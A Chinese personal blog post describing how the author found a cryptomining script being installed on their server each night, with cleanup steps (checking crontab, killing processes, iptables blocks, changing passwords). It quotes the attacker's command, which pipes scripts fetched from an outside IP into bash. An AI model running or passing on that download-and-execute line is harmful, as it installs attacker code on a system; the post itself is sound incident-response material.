• Home
  • Archives
  • 随笔
所有文章 友链 关于我

  • Home
  • Archives
  • 随笔

震惊 服务器被挖坑了

发布于: 2021-06-04
更新于: 2023-07-09

服务器安全

监控

今天上云监控,发现每天凌晨都被人拉脚本进去安装,赶紧找方法把它给干了

sh -c [ -f \"/bin/bash\" ] && (curl -s http://194.38.20.199/ph.sh||wget -q -O- http://194.38.20.199/ph.sh)|bash || (curl -s http://194.38.20.199/ph2.sh||wget -q -O- http://194.38.20.199/ph2.sh)|sh

20210604064320

排查

CPU 排查

CPU 进程使用htop查询,GPU 等使用gputstat或者nvtop进行查询。

查询启动进程

# 查看有无奇怪的启动命令
crontab -l
cat /etc/crontab

解决措施

禁止 ip

iptables -A OUTPUT -d 195.3.146.118 -j DROP
iptables -A OUTPUT -d 194.38.20.199 -j DROP

2021年8月9日 06:38:59更新,补充大致措施

1️⃣ 看看有没有还在跑的程序,如果有的话,kill掉它
2️⃣ 看看自启动中有没有奇怪的东西
3️⃣ 禁止ip,ip你也得看挖矿程序是想配置哪些ip的
4️⃣ 看看它是拿什么帐号登上来,把密码改一下,可能是密码泄露了。
5️⃣ Btw,看看自己服务器的安全等级是否足够,比如说限制root登录,禁止一些不用的端口之类的。

震惊 服务器被挖坑了
/archives/54b9ea3f/
作者
tyrantqiao
发布于
2021-06-04
更新于
2023-07-09
许可协议
CC BY-NC-SA 4.0
赏

蟹蟹大佬的打赏,大家一起进步

支付宝
微信
  • centos

扫一扫,分享到微信

微信分享二维码
计算机网络从0到放弃之旅!
域名解析
© 2024 tyrantqiao 本站总访问量次 本站访客数人次 载入天数...载入时分秒...
  • 所有文章
  • 友链
  • 关于我

tag:

  • 复盘
  • 我
  • 规划
  • java
  • 面试
  • 源码
  • 架构
  • Hadoop
  • HTTP
  • TCP
  • 学习笔记
  • IDEA
  • maven
  • idea
  • Java
  • jdk
  • 面经
  • linux
  • 爱情
  • mysql
  • 性能
  • sql
  • Mysql
  • JAVA
  • 技术
  • Redis
  • MQ
  • Spring
  • 数据库
  • TIDB
  • spring
  • unity
  • chatgpt
  • 经验分享
  • 前端
  • redis
  • vue
  • git
  • shadowsocks
  • hexo
  • blog
  • bug
  • 开发
  • 业务
  • jvm
  • 算法
  • MySQL
  • nginx
  • Linux
  • mq
  • db
  • springCloud
  • ssh
  • python
  • 爬虫
  • test
  • vim
  • 影视剧
  • 中间件
  • 事务
  • 性格
  • 音乐
  • 程序员
  • 随笔
  • mybatis
  • 演讲
  • 域名
  • 猫咪
  • 她
  • github
  • 计划
  • 旅游
  • 软件
  • 心理
  • 情商
  • 幽默
  • 才艺
  • 穿搭
  • 编程
  • 排序
  • 查找
  • 缓存
  • 网络
  • 设计模式
  • c
  • 课程设计
  • centos
  • 数学
  • 本网站主题yilia设计者的主页
如果有问题或者想讨论的可以联系[email protected]或者[email protected]